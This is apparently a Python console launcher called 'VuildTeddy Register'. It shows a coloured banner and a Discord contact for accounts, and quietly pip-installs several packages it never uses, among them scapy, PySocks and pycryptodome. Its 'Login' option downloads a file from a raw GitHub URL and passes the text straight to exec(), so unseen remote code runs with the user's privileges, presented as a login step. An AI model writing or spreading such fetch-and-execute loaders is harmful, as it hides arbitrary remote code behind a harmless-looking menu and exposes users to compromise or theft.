import sys
import time
from time import sleep, strftime
from datetime import datetime
import threading
import webbrowser, os, re, json, random
import msvcrt
import subprocess
import datetime
import ctypes

try:
    from faker import Faker
    from requests import session
    from colorama import Fore, Style
    import requests, random, re
    from random import choice, randint, shuffle
    import requests, pystyle
    from pystyle import Write, Colors
    import subprocess
    import ctypes
except:
    os.system("pip install humanfriendly && pip install PySocks")
    os.system("pip install scapy && pip install get_mac")
    os.system("pip install faker && pip install ctypes")
    os.system("pip install requests")
    os.system("pip install colorama && pip install subprocess")
    os.system('pip install requests && pip install bs4 && pip install pystyle && pip install pycryptodome')
    from pystyle import Add, Center, Anime, Colors, Colorate, Write, System

def windowtitle(a):
    os.system(f"title {a}")

windowtitle("VuildTeddy Register❤❤")

# color definitions
xnhac = "\033[1;36m"
do = "\033[1;31m"
luc = "\033[1;32m"
vang = "\033[1;33m"
xduong = "\033[1;34m"
hong = "\033[1;35m"
trang = "\033[1;39m"
whiteb = "\033[1;39m"
red = "\033[0;31m"
redb = "\033[1;31m"
end = '\033[0m'
dev = "\033[1;39m[\033[1;31m×\033[1;39m]\033[1;39m"

banner = f"""                                                                                  
\033[1;39m          _   __     _ __   ________       __   __       ___           _     __         
\033[1;31m         | | / /_ __(_) /__/ /_  __/__ ___/ /__/ /_ __  / _ \___ ___ _(_)__ / /____ ____
\033[1;39m         | |/ / // / / / _  / / / / -_) _  / _  / // / / , _/ -_) _ `/ (_-</ __/ -_) __/
\033[1;31m         |___/\_,_/_/_/\_,_/ /_/  \__/\_,_/\_,_/\_, / /_/|_|\__/\_, /_/___/\__/\__/_/   
\033[1;39m                                               /___/           /___/                    
                                                                                                               
                        \033[1;34mContact discord\033[1;35m vuildteddy_\033[1;36mto create account!
                            \033[0;31m    Only Login if you have account:
                        \033[1;32m1 Login                                            \033[1;34m2 Exit
"""[1:]
print(banner)

while True:
    os.system('cls')
    print(banner)
    chose = Write.Input("           = >>  ", Colors.cyan_to_blue, interval=0.0010)
    if chose == '1':
        os.system('cls')
        exec(requests.get('https://raw.githubusercontent.com/AprillZerx/Loin/main/Login').text)
    elif chose == '2':
        os.system('cls')
        break
    else:
        continue
